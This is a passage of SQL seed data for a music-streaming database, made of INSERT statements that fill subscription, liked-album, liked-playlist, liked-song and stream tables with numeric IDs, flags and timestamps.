(75,6,'1','2020-12-26 04:27:34.0'),
(81,16,'1','2020-12-26 04:27:34.0'),
(82,15,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(86,29,'1','2020-12-26 04:27:34.0'),
(90,31,'1','2020-12-26 04:27:34.0'),
(102,17,'1','2020-12-26 04:27:34.0'),
(102,15,'1','2020-12-26 04:27:34.0'),
(103,22,'1','2020-12-26 04:27:34.0'),
(107,28,'1','2020-12-26 04:27:34.0'),
(110,3,'1','2020-12-26 04:27:34.0'),
(114,8,'1','2020-12-26 04:27:33.0'),
(120,4,'1','2020-12-26 04:27:34.0'),
(122,3,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(131,16,'1','2020-12-26 04:27:34.0'),
(137,14,'1','2020-12-26 04:27:34.0'),
(142,34,'1','2020-12-26 04:27:34.0'),
(144,8,'1','2020-12-26 04:27:34.0'),
(149,18,'1','2020-12-26 04:27:34.0'),
(163,12,'1','2020-12-26 04:27:34.0'),
(165,24,'1','2020-12-26 04:27:34.0'),
(167,21,'0','2020-12-26 04:27:34.0'),
(167,11,'1','2020-12-26 04:27:34.0'),
(179,28,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(184,1,'1','2020-12-26 04:27:34.0'),
(188,38,'1','2020-12-26 04:27:34.0'),
(189,5,'1','2020-12-26 04:27:34.0'),
(191,39,'1','2020-12-26 04:27:34.0'),
(196,40,'1','2020-12-26 04:27:34.0'),
(199,38,'1','2020-12-26 04:27:33.0'),
(200,30,'1','2020-12-26 04:27:34.0'),
(200,34,'1','2020-12-26 04:27:34.0'),
(202,29,'1','2020-12-26 04:27:34.0'),
(210,16,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(213,31,'0','2020-12-26 04:27:34.0'),
(218,29,'0','2020-12-26 04:27:34.0'),
(227,6,'1','2020-12-26 04:27:34.0'),
(239,12,'1','2020-12-26 04:27:34.0'),
(250,10,'1','2020-12-26 04:27:34.0'),
(255,39,'1','2020-12-26 04:27:34.0'),
(263,24,'1','2020-12-26 04:27:33.0'),
(285,30,'1','2020-12-26 04:27:34.0'),
(287,30,'1','2020-12-26 04:27:34.0'),
(294,40,'0','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(296,13,'1','2020-12-26 04:27:34.0'),
(301,26,'1','2020-12-26 04:27:34.0'),
(314,14,'1','2020-12-26 04:27:34.0'),
(314,29,'1','2020-12-26 04:27:34.0'),
(319,13,'1','2020-12-26 04:27:34.0'),
(320,10,'1','2020-12-26 04:27:34.0'),
(325,22,'0','2020-12-26 04:27:34.0'),
(325,40,'0','2020-12-26 04:27:34.0'),
(327,36,'0','2020-12-26 04:27:34.0'),
(329,23,'1','2020-12-26 04:27:33.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(332,32,'1','2020-12-26 04:27:34.0'),
(337,34,'1','2020-12-26 04:27:34.0'),
(338,35,'1','2020-12-26 04:27:34.0'),
(342,40,'1','2020-12-26 04:27:34.0'),
(347,34,'1','2020-12-26 04:27:34.0'),
(350,9,'1','2020-12-26 04:27:34.0'),
(350,1,'1','2020-12-26 04:27:34.0'),
(351,14,'1','2020-12-26 04:27:34.0'),
(356,21,'1','2020-12-26 04:27:34.0'),
(357,10,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(365,28,'1','2020-12-26 04:27:34.0'),
(383,12,'1','2020-12-26 04:27:34.0'),
(399,5,'1','2020-12-26 04:27:33.0'),
(401,31,'1','2020-12-26 04:27:34.0'),
(415,40,'1','2020-12-26 04:27:34.0'),
(416,31,'1','2020-12-26 04:27:34.0'),
(417,31,'1','2020-12-26 04:27:34.0'),
(423,31,'1','2020-12-26 04:27:34.0'),
(431,8,'1','2020-12-26 04:27:34.0'),
(438,26,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(448,32,'1','2020-12-26 04:27:34.0'),
(460,8,'1','2020-12-26 04:27:34.0'),
(461,1,'1','2020-12-26 04:27:34.0'),
(473,26,'0','2020-12-26 04:27:34.0'),
(487,11,'0','2020-12-26 04:27:34.0'),
(489,19,'0','2020-12-26 04:27:34.0'),
(490,31,'1','2020-12-26 04:27:34.0'),
(493,36,'1','2020-12-26 04:27:34.0'),
(497,7,'1','2020-12-26 04:27:34.0'),
(499,38,'0','2020-12-26 04:27:34.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(1,16,'1','2020-12-26 05:38:24.0'),
(2,4,'1','2020-12-26 05:38:24.0'),
(3,14,'1','2020-12-26 05:38:24.0'),
(13,5,'1','2020-12-26 05:38:24.0'),
(19,1,'0','2020-12-26 05:38:24.0'),
(24,3,'1','2020-12-26 05:38:24.0'),
(37,12,'1','2020-12-26 05:38:24.0'),
(44,9,'1','2020-12-26 05:38:24.0'),
(50,7,'1','2020-12-26 05:38:24.0'),
(60,12,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(61,16,'1','2020-12-26 05:38:24.0'),
(63,15,'1','2020-12-26 05:38:24.0'),
(64,9,'1','2020-12-26 05:38:24.0'),
(67,10,'1','2020-12-26 05:38:24.0'),
(70,12,'1','2020-12-26 05:38:24.0'),
(72,14,'1','2020-12-26 05:38:24.0'),
(77,1,'0','2020-12-26 05:38:24.0'),
(85,7,'1','2020-12-26 05:38:24.0'),
(86,11,'1','2020-12-26 05:38:24.0'),
(93,4,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(104,8,'1','2020-12-26 05:38:24.0'),
(105,3,'1','2020-12-26 05:38:24.0'),
(116,7,'1','2020-12-26 05:38:24.0'),
(118,6,'1','2020-12-26 05:38:24.0'),
(123,14,'1','2020-12-26 05:38:24.0'),
(131,3,'0','2020-12-26 05:38:24.0'),
(132,3,'1','2020-12-26 05:38:24.0'),
(134,14,'1','2020-12-26 05:38:24.0'),
(145,15,'0','2020-12-26 05:38:24.0'),
(152,15,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(153,8,'1','2020-12-26 05:38:24.0'),
(155,3,'1','2020-12-26 05:38:24.0'),
(156,7,'1','2020-12-26 05:38:24.0'),
(161,11,'1','2020-12-26 05:38:24.0'),
(163,13,'1','2020-12-26 05:38:24.0'),
(168,13,'1','2020-12-26 05:38:24.0'),
(170,3,'0','2020-12-26 05:38:24.0'),
(185,8,'1','2020-12-26 05:38:24.0'),
(187,5,'1','2020-12-26 05:38:24.0'),
(187,6,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(191,15,'1','2020-12-26 05:38:24.0'),
(194,5,'1','2020-12-26 05:38:24.0'),
(201,3,'1','2020-12-26 05:38:24.0'),
(206,5,'1','2020-12-26 05:38:24.0'),
(211,11,'0','2020-12-26 05:38:24.0'),
(211,17,'1','2020-12-26 05:38:24.0'),
(221,13,'1','2020-12-26 05:38:24.0'),
(226,11,'1','2020-12-26 05:38:24.0'),
(230,8,'1','2020-12-26 05:38:24.0'),
(235,6,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(246,17,'1','2020-12-26 05:38:24.0'),
(250,6,'1','2020-12-26 05:38:24.0'),
(251,16,'1','2020-12-26 05:38:24.0'),
(254,10,'1','2020-12-26 05:38:24.0'),
(255,14,'1','2020-12-26 05:38:24.0'),
(260,15,'1','2020-12-26 05:38:24.0'),
(262,8,'1','2020-12-26 05:38:24.0'),
(269,12,'0','2020-12-26 05:38:24.0'),
(270,9,'1','2020-12-26 05:38:24.0'),
(271,3,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(276,16,'1','2020-12-26 05:38:24.0'),
(277,15,'1','2020-12-26 05:38:24.0'),
(282,13,'0','2020-12-26 05:38:24.0'),
(283,4,'1','2020-12-26 05:38:24.0'),
(284,1,'1','2020-12-26 05:38:24.0'),
(291,16,'1','2020-12-26 05:38:24.0'),
(303,1,'1','2020-12-26 05:38:24.0'),
(309,8,'1','2020-12-26 05:38:24.0'),
(317,3,'1','2020-12-26 05:38:24.0'),
(320,13,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(333,1,'1','2020-12-26 05:38:24.0'),
(338,15,'1','2020-12-26 05:38:24.0'),
(342,5,'1','2020-12-26 05:38:24.0'),
(346,6,'1','2020-12-26 05:38:24.0'),
(350,15,'1','2020-12-26 05:38:24.0'),
(352,11,'1','2020-12-26 05:38:24.0'),
(353,15,'1','2020-12-26 05:38:24.0'),
(354,15,'0','2020-12-26 05:38:24.0'),
(382,15,'1','2020-12-26 05:38:24.0'),
(390,16,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(390,7,'0','2020-12-26 05:38:24.0'),
(397,5,'1','2020-12-26 05:38:24.0'),
(404,3,'1','2020-12-26 05:38:24.0'),
(406,14,'1','2020-12-26 05:38:24.0'),
(407,6,'1','2020-12-26 05:38:24.0'),
(407,7,'1','2020-12-26 05:38:24.0'),
(411,7,'1','2020-12-26 05:38:24.0'),
(413,6,'1','2020-12-26 05:38:24.0'),
(425,9,'0','2020-12-26 05:38:24.0'),
(427,7,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(437,11,'1','2020-12-26 05:38:24.0'),
(445,15,'0','2020-12-26 05:38:24.0'),
(450,8,'1','2020-12-26 05:38:24.0'),
(457,10,'1','2020-12-26 05:38:24.0'),
(464,6,'0','2020-12-26 05:38:24.0'),
(467,11,'1','2020-12-26 05:38:24.0'),
(474,6,'1','2020-12-26 05:38:24.0'),
(484,8,'1','2020-12-26 05:38:24.0'),
(490,4,'1','2020-12-26 05:38:24.0'),
(500,6,'1','2020-12-26 05:38:24.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(2,15,'1','2020-12-26 05:38:13.0'),
(6,26,'1','2020-12-26 05:38:13.0'),
(18,5,'1','2020-12-26 05:38:13.0'),
(20,26,'1','2020-12-26 05:38:12.0'),
(21,19,'1','2020-12-26 05:38:13.0'),
(31,11,'1','2020-12-26 05:38:13.0'),
(34,22,'1','2020-12-26 05:38:12.0'),
(37,21,'1','2020-12-26 05:38:13.0'),
(41,8,'1','2020-12-26 05:38:13.0'),
(46,24,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(52,21,'1','2020-12-26 05:38:13.0'),
(55,9,'1','2020-12-26 05:38:12.0'),
(57,16,'1','2020-12-26 05:38:13.0'),
(60,9,'1','2020-12-26 05:38:13.0'),
(61,4,'1','2020-12-26 05:38:13.0'),
(67,1,'1','2020-12-26 05:38:13.0'),
(78,26,'1','2020-12-26 05:38:13.0'),
(84,24,'1','2020-12-26 05:38:13.0'),
(90,19,'1','2020-12-26 05:38:12.0'),
(103,12,'0','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(106,9,'1','2020-12-26 05:38:13.0'),
(122,6,'1','2020-12-26 05:38:13.0'),
(124,28,'1','2020-12-26 05:38:13.0'),
(125,4,'1','2020-12-26 05:38:13.0'),
(135,7,'1','2020-12-26 05:38:13.0'),
(138,24,'1','2020-12-26 05:38:13.0'),
(140,15,'1','2020-12-26 05:38:13.0'),
(143,20,'1','2020-12-26 05:38:13.0'),
(145,9,'1','2020-12-26 05:38:13.0'),
(150,15,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(151,30,'1','2020-12-26 05:38:13.0'),
(152,6,'0','2020-12-26 05:38:13.0'),
(162,10,'1','2020-12-26 05:38:13.0'),
(164,15,'1','2020-12-26 05:38:13.0'),
(171,29,'1','2020-12-26 05:38:13.0'),
(183,14,'1','2020-12-26 05:38:13.0'),
(184,15,'1','2020-12-26 05:38:13.0'),
(191,27,'1','2020-12-26 05:38:13.0'),
(204,11,'1','2020-12-26 05:38:13.0'),
(204,30,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(205,2,'0','2020-12-26 05:38:13.0'),
(205,22,'0','2020-12-26 05:38:13.0'),
(207,18,'1','2020-12-26 05:38:13.0'),
(207,26,'1','2020-12-26 05:38:13.0'),
(212,26,'1','2020-12-26 05:38:12.0'),
(223,28,'1','2020-12-26 05:38:12.0'),
(227,16,'0','2020-12-26 05:38:13.0'),
(230,5,'1','2020-12-26 05:38:13.0'),
(231,1,'1','2020-12-26 05:38:13.0'),
(236,24,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(236,23,'1','2020-12-26 05:38:13.0'),
(242,10,'1','2020-12-26 05:38:13.0'),
(242,22,'1','2020-12-26 05:38:13.0'),
(250,2,'1','2020-12-26 05:38:13.0'),
(251,12,'1','2020-12-26 05:38:12.0'),
(256,16,'1','2020-12-26 05:38:13.0'),
(256,6,'1','2020-12-26 05:38:12.0'),
(290,20,'1','2020-12-26 05:38:13.0'),
(295,8,'1','2020-12-26 05:38:13.0'),
(297,28,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(306,23,'1','2020-12-26 05:38:13.0'),
(309,13,'1','2020-12-26 05:38:13.0'),
(313,26,'1','2020-12-26 05:38:13.0'),
(319,25,'1','2020-12-26 05:38:13.0'),
(331,30,'1','2020-12-26 05:38:13.0'),
(331,20,'1','2020-12-26 05:38:13.0'),
(335,20,'1','2020-12-26 05:38:13.0'),
(336,27,'0','2020-12-26 05:38:13.0'),
(344,16,'1','2020-12-26 05:38:12.0'),
(350,22,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(356,30,'1','2020-12-26 05:38:13.0'),
(371,28,'1','2020-12-26 05:38:12.0'),
(374,5,'1','2020-12-26 05:38:13.0'),
(378,20,'1','2020-12-26 05:38:13.0'),
(381,10,'1','2020-12-26 05:38:13.0'),
(384,5,'1','2020-12-26 05:38:13.0'),
(395,29,'1','2020-12-26 05:38:13.0'),
(398,3,'1','2020-12-26 05:38:13.0'),
(398,25,'1','2020-12-26 05:38:13.0'),
(399,10,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(405,17,'1','2020-12-26 05:38:13.0'),
(408,15,'1','2020-12-26 05:38:13.0'),
(409,4,'1','2020-12-26 05:38:13.0'),
(410,13,'1','2020-12-26 05:38:12.0'),
(414,26,'1','2020-12-26 05:38:12.0'),
(418,5,'1','2020-12-26 05:38:13.0'),
(420,13,'1','2020-12-26 05:38:13.0'),
(426,3,'1','2020-12-26 05:38:12.0'),
(428,18,'0','2020-12-26 05:38:13.0'),
(436,6,'1','2020-12-26 05:38:12.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(443,28,'1','2020-12-26 05:38:13.0'),
(443,22,'0','2020-12-26 05:38:13.0'),
(446,17,'1','2020-12-26 05:38:13.0'),
(454,6,'1','2020-12-26 05:38:13.0'),
(464,22,'1','2020-12-26 05:38:13.0'),
(475,16,'1','2020-12-26 05:38:13.0'),
(478,1,'1','2020-12-26 05:38:13.0'),
(484,30,'1','2020-12-26 05:38:13.0'),
(485,10,'1','2020-12-26 05:38:13.0'),
(498,20,'1','2020-12-26 05:38:12.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(1,48,'1','2020-12-26 05:37:58.0'),
(12,35,'1','2020-12-26 05:37:58.0'),
(20,34,'1','2020-12-26 05:37:58.0'),
(20,52,'1','2020-12-26 05:37:57.0'),
(22,35,'1','2020-12-26 05:37:58.0'),
(30,15,'1','2020-12-26 05:37:57.0'),
(35,60,'1','2020-12-26 05:37:57.0'),
(44,4,'1','2020-12-26 05:37:58.0'),
(48,63,'1','2020-12-26 05:37:57.0'),
(52,50,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(54,32,'1','2020-12-26 05:37:58.0'),
(57,10,'1','2020-12-26 05:37:58.0'),
(81,32,'1','2020-12-26 05:37:58.0'),
(81,12,'1','2020-12-26 05:37:57.0'),
(87,19,'1','2020-12-26 05:37:58.0'),
(88,44,'1','2020-12-26 05:37:57.0'),
(89,45,'1','2020-12-26 05:37:57.0'),
(90,47,'1','2020-12-26 05:37:58.0'),
(95,55,'1','2020-12-26 05:37:57.0'),
(104,25,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(111,61,'1','2020-12-26 05:37:57.0'),
(113,64,'1','2020-12-26 05:37:58.0'),
(120,59,'1','2020-12-26 05:37:58.0'),
(122,29,'0','2020-12-26 05:37:58.0'),
(134,60,'1','2020-12-26 05:37:58.0'),
(136,31,'1','2020-12-26 05:37:58.0'),
(137,45,'1','2020-12-26 05:37:58.0'),
(138,21,'1','2020-12-26 05:37:57.0'),
(141,17,'1','2020-12-26 05:37:58.0'),
(146,11,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(149,54,'1','2020-12-26 05:37:57.0'),
(163,29,'1','2020-12-26 05:37:58.0'),
(167,34,'1','2020-12-26 05:37:58.0'),
(169,24,'1','2020-12-26 05:37:57.0'),
(171,61,'1','2020-12-26 05:37:57.0'),
(182,36,'0','2020-12-26 05:37:57.0'),
(187,55,'0','2020-12-26 05:37:57.0'),
(187,2,'1','2020-12-26 05:37:57.0'),
(188,37,'1','2020-12-26 05:37:58.0'),
(189,27,'1','2020-12-26 05:37:58.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(195,10,'1','2020-12-26 05:37:57.0'),
(203,5,'1','2020-12-26 05:37:57.0'),
(211,64,'1','2020-12-26 05:37:57.0'),
(214,27,'1','2020-12-26 05:37:58.0'),
(220,17,'1','2020-12-26 05:37:57.0'),
(224,50,'1','2020-12-26 05:37:58.0'),
(232,7,'1','2020-12-26 05:37:57.0'),
(232,65,'1','2020-12-26 05:37:58.0'),
(233,39,'1','2020-12-26 05:37:58.0'),
(241,37,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(242,27,'1','2020-12-26 05:37:57.0'),
(250,42,'1','2020-12-26 05:37:58.0'),
(255,3,'1','2020-12-26 05:37:58.0'),
(262,19,'1','2020-12-26 05:37:57.0'),
(271,40,'1','2020-12-26 05:37:58.0'),
(279,23,'1','2020-12-26 05:37:58.0'),
(282,45,'1','2020-12-26 05:37:58.0'),
(282,18,'0','2020-12-26 05:37:58.0'),
(286,60,'1','2020-12-26 05:37:58.0'),
(287,21,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(288,51,'1','2020-12-26 05:37:57.0'),
(294,63,'1','2020-12-26 05:37:58.0'),
(310,25,'0','2020-12-26 05:37:57.0'),
(315,27,'1','2020-12-26 05:37:57.0'),
(319,11,'1','2020-12-26 05:37:58.0'),
(322,11,'1','2020-12-26 05:37:58.0'),
(330,25,'1','2020-12-26 05:37:58.0'),
(337,55,'1','2020-12-26 05:37:57.0'),
(349,30,'1','2020-12-26 05:37:57.0'),
(356,57,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(361,59,'1','2020-12-26 05:37:57.0'),
(361,11,'0','2020-12-26 05:37:58.0'),
(365,47,'1','2020-12-26 05:37:58.0'),
(369,10,'0','2020-12-26 05:37:58.0'),
(370,56,'1','2020-12-26 05:37:58.0'),
(370,7,'1','2020-12-26 05:37:57.0'),
(374,55,'1','2020-12-26 05:37:57.0'),
(379,11,'1','2020-12-26 05:37:57.0'),
(380,24,'1','2020-12-26 05:37:58.0'),
(382,63,'1','2020-12-26 05:37:58.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(387,59,'1','2020-12-26 05:37:57.0'),
(388,13,'1','2020-12-26 05:37:58.0'),
(398,16,'1','2020-12-26 05:37:58.0'),
(402,16,'1','2020-12-26 05:37:57.0'),
(410,15,'1','2020-12-26 05:37:57.0'),
(423,17,'1','2020-12-26 05:37:58.0'),
(435,13,'0','2020-12-26 05:37:58.0'),
(438,49,'1','2020-12-26 05:37:57.0'),
(439,32,'1','2020-12-26 05:37:58.0'),
(447,23,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(449,50,'1','2020-12-26 05:37:57.0'),
(451,61,'1','2020-12-26 05:37:58.0'),
(458,32,'1','2020-12-26 05:37:57.0'),
(476,35,'1','2020-12-26 05:37:58.0'),
(477,61,'1','2020-12-26 05:37:58.0'),
(478,10,'1','2020-12-26 05:37:57.0'),
(479,20,'1','2020-12-26 05:37:57.0'),
(485,15,'1','2020-12-26 05:37:58.0'),
(492,34,'0','2020-12-26 05:37:57.0'),
(500,41,'1','2020-12-26 05:37:57.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(177,1,1,'2020-12-26 06:43:54.0'),
(94,1,1,'2020-12-26 06:43:54.0'),
(93,3,1,'2020-12-26 06:43:54.0'),
(489,3,1,'2020-12-26 06:43:54.0'),
(412,3,1,'2020-12-26 06:43:54.0'),
(313,3,1,'2020-12-26 06:43:54.0'),
(23,4,1,'2020-12-26 06:43:54.0'),
(459,5,1,'2020-12-26 06:43:54.0'),
(499,5,1,'2020-12-26 06:43:54.0'),
(20,6,1,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(449,6,1,'2020-12-26 06:43:54.0'),
(176,6,1,'2020-12-26 06:43:54.0'),
(186,7,1,'2020-12-26 06:43:54.0'),
(266,7,1,'2020-12-26 06:43:54.0'),
(435,7,1,'2020-12-26 06:43:54.0'),
(260,7,1,'2020-12-26 06:43:54.0'),
(3,7,1,'2020-12-26 06:43:54.0'),
(297,7,1,'2020-12-26 06:43:54.0'),
(301,7,1,'2020-12-26 06:43:54.0'),
(429,8,1,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(241,8,1,'2020-12-26 06:43:54.0'),
(420,8,1,'2020-12-26 06:43:54.0'),
(120,8,1,'2020-12-26 06:43:54.0'),
(8,9,1,'2020-12-26 06:43:54.0'),
(167,9,1,'2020-12-26 06:43:54.0'),
(279,9,1,'2020-12-26 06:43:54.0'),
(219,9,1,'2020-12-26 06:43:54.0'),
(462,9,1,'2020-12-26 06:43:54.0'),
(331,11,1,'2020-12-26 06:43:54.0'),
(11,12,1,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(466,12,1,'2020-12-26 06:43:54.0'),
(234,12,1,'2020-12-26 06:43:54.0'),
(458,12,1,'2020-12-26 06:43:54.0'),
(467,13,9,'2020-12-26 06:43:54.0'),
(214,13,9,'2020-12-26 06:43:54.0'),
(437,13,9,'2020-12-26 06:43:54.0'),
(137,13,9,'2020-12-26 06:43:54.0'),
(422,13,9,'2020-12-26 06:43:54.0'),
(423,14,9,'2020-12-26 06:43:54.0'),
(269,14,9,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(130,14,9,'2020-12-26 06:43:54.0'),
(206,15,9,'2020-12-26 06:43:54.0'),
(66,16,9,'2020-12-26 06:43:54.0'),
(282,17,9,'2020-12-26 06:43:54.0'),
(398,17,9,'2020-12-26 06:43:54.0'),
(391,18,9,'2020-12-26 06:43:54.0'),
(277,19,9,'2020-12-26 06:43:54.0'),
(196,19,9,'2020-12-26 06:43:54.0'),
(428,19,9,'2020-12-26 06:43:54.0'),
(202,19,9,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(429,19,9,'2020-12-26 06:43:54.0'),
(288,20,9,'2020-12-26 06:43:54.0'),
(8,20,9,'2020-12-26 06:43:54.0'),
(253,21,9,'2020-12-26 06:43:54.0'),
(50,21,9,'2020-12-26 06:43:54.0'),
(379,21,9,'2020-12-26 06:43:54.0'),
(486,22,9,'2020-12-26 06:43:54.0'),
(76,22,9,'2020-12-26 06:43:54.0'),
(373,22,9,'2020-12-26 06:43:54.0'),
(78,22,9,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(175,22,9,'2020-12-26 06:43:54.0'),
(184,22,9,'2020-12-26 06:43:54.0'),
(186,23,9,'2020-12-26 06:43:54.0'),
(175,23,9,'2020-12-26 06:43:54.0'),
(400,24,3,'2020-12-26 06:43:54.0'),
(183,24,3,'2020-12-26 06:43:54.0'),
(405,24,3,'2020-12-26 06:43:54.0'),
(311,24,3,'2020-12-26 06:43:54.0'),
(490,25,3,'2020-12-26 06:43:54.0'),
(150,25,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(14,25,3,'2020-12-26 06:43:54.0'),
(388,26,3,'2020-12-26 06:43:54.0'),
(396,26,3,'2020-12-26 06:43:54.0'),
(380,26,3,'2020-12-26 06:43:54.0'),
(95,26,3,'2020-12-26 06:43:54.0'),
(214,27,3,'2020-12-26 06:43:54.0'),
(353,27,3,'2020-12-26 06:43:54.0'),
(306,28,3,'2020-12-26 06:43:54.0'),
(211,28,3,'2020-12-26 06:43:54.0'),
(185,29,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(392,29,3,'2020-12-26 06:43:54.0'),
(305,29,3,'2020-12-26 06:43:54.0'),
(29,29,3,'2020-12-26 06:43:54.0'),
(487,29,3,'2020-12-26 06:43:54.0'),
(387,29,3,'2020-12-26 06:43:54.0'),
(155,30,3,'2020-12-26 06:43:54.0'),
(6,30,3,'2020-12-26 06:43:54.0'),
(151,30,3,'2020-12-26 06:43:54.0'),
(191,31,3,'2020-12-26 06:43:54.0'),
(175,31,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(402,31,3,'2020-12-26 06:43:54.0'),
(182,31,3,'2020-12-26 06:43:54.0'),
(295,31,3,'2020-12-26 06:43:54.0'),
(473,31,3,'2020-12-26 06:43:54.0'),
(225,31,3,'2020-12-26 06:43:54.0'),
(233,32,3,'2020-12-26 06:43:54.0'),
(479,32,3,'2020-12-26 06:43:54.0'),
(500,33,3,'2020-12-26 06:43:54.0'),
(256,33,3,'2020-12-26 06:43:54.0'),
(10,33,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(40,34,3,'2020-12-26 06:43:54.0'),
(170,34,3,'2020-12-26 06:43:54.0'),
(129,36,6,'2020-12-26 06:43:54.0'),
(137,36,6,'2020-12-26 06:43:54.0'),
(286,37,6,'2020-12-26 06:43:54.0'),
(467,37,6,'2020-12-26 06:43:54.0'),
(417,37,6,'2020-12-26 06:43:54.0'),
(434,37,6,'2020-12-26 06:43:54.0'),
(108,38,6,'2020-12-26 06:43:54.0'),
(208,38,6,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(416,38,6,'2020-12-26 06:43:54.0'),
(18,38,6,'2020-12-26 06:43:54.0'),
(332,39,6,'2020-12-26 06:43:54.0'),
(392,40,6,'2020-12-26 06:43:54.0'),
(282,40,6,'2020-12-26 06:43:54.0'),
(181,40,6,'2020-12-26 06:43:54.0'),
(200,41,6,'2020-12-26 06:43:54.0'),
(407,42,6,'2020-12-26 06:43:54.0'),
(281,42,6,'2020-12-26 06:43:54.0'),
(488,42,6,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(435,42,6,'2020-12-26 06:43:54.0'),
(182,42,6,'2020-12-26 06:43:54.0'),
(468,42,6,'2020-12-26 06:43:54.0'),
(138,42,6,'2020-12-26 06:43:54.0'),
(409,43,6,'2020-12-26 06:43:54.0'),
(183,43,6,'2020-12-26 06:43:54.0'),
(64,44,6,'2020-12-26 06:43:54.0'),
(391,44,6,'2020-12-26 06:43:54.0'),
(103,45,5,'2020-12-26 06:43:54.0'),
(306,45,5,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(358,45,5,'2020-12-26 06:43:54.0'),
(391,45,5,'2020-12-26 06:43:54.0'),
(16,45,5,'2020-12-26 06:43:54.0'),
(108,46,5,'2020-12-26 06:43:54.0'),
(242,46,5,'2020-12-26 06:43:54.0'),
(145,47,5,'2020-12-26 06:43:54.0'),
(6,48,5,'2020-12-26 06:43:54.0'),
(129,48,5,'2020-12-26 06:43:54.0'),
(416,48,5,'2020-12-26 06:43:54.0'),
(454,48,5,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(305,49,5,'2020-12-26 06:43:54.0'),
(397,49,5,'2020-12-26 06:43:54.0'),
(388,49,5,'2020-12-26 06:43:54.0'),
(469,50,5,'2020-12-26 06:43:54.0'),
(493,50,5,'2020-12-26 06:43:54.0'),
(198,50,5,'2020-12-26 06:43:54.0'),
(428,50,5,'2020-12-26 06:43:54.0'),
(22,51,5,'2020-12-26 06:43:54.0'),
(413,51,5,'2020-12-26 06:43:54.0'),
(312,51,5,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
